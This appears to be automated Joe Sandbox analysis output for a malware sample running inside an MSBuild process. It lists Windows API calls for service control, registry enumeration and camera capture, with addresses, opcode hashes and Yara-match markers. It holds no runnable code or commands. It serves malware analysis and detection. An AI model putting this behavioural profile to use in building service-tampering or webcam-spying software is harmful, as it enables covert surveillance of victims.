                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                    • Opcode ID: e717a979b06a6d59714d5f6060216880ad0b40e6851c78038ac3081c6fc0778a
                                                                                                                                                                                    • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                                                                                                    • Opcode Fuzzy Hash: e717a979b06a6d59714d5f6060216880ad0b40e6851c78038ac3081c6fc0778a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                    • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                    • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                    • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                    • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                    • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                    • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __cftoe
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4189289331-0
                                                                                                                                                                                    • Opcode ID: 9b2fc1694d82a2623a89bc6481469fa908d9f87ebd85e1474d8b0e6b87dad09b
                                                                                                                                                                                    • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b2fc1694d82a2623a89bc6481469fa908d9f87ebd85e1474d8b0e6b87dad09b
                                                                                                                                                                                    • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                                                    • API String ID: 3509577899-3206640213
                                                                                                                                                                                    • Opcode ID: 2c17f2c40f1def4b87b50b05918a15924d6aa944bacacfbbec5d706d53638fec
                                                                                                                                                                                    • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c17f2c40f1def4b87b50b05918a15924d6aa944bacacfbbec5d706d53638fec
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                                                                                      • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: H_prologSleep
                                                                                                                                                                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                                                                                                    • API String ID: 3469354165-462540288
                                                                                                                                                                                    • Opcode ID: 12dbee474d2ea48be87971401ead378cd366a78fab0cfcb742a3e04c13473d95
                                                                                                                                                                                    • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12dbee474d2ea48be87971401ead378cd366a78fab0cfcb742a3e04c13473d95
                                                                                                                                                                                    • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                    • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1922816806-0
                                                                                                                                                                                    • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                    • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3594823470-0
                                                                                                                                                                                    • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                    • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                    • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 493672254-0
                                                                                                                                                                                    • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                                                                                    • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                    • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                    • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                    • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                                                                                    • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                                                                                                    • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                    • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                    • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                    • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                    • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                    • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                                    • _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                    • _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                                    • _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                    • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                    • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                                                                                                    • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                                    • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                                                                                                    • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                                    • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                                                                                                    • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                                                                                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 221034970-0
                                                                                                                                                                                    • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                                                                                                    • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Enum$InfoQueryValue
                                                                                                                                                                                    • String ID: [regsplt]$DG
                                                                                                                                                                                    • API String ID: 3554306468-1089238109
                                                                                                                                                                                    • Opcode ID: 6f7bd9bebdea3cfaa5ac79ccd65013da005c6902dca7ebe2f9e4052a80e7bc07
                                                                                                                                                                                    • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f7bd9bebdea3cfaa5ac79ccd65013da005c6902dca7ebe2f9e4052a80e7bc07
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                      • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
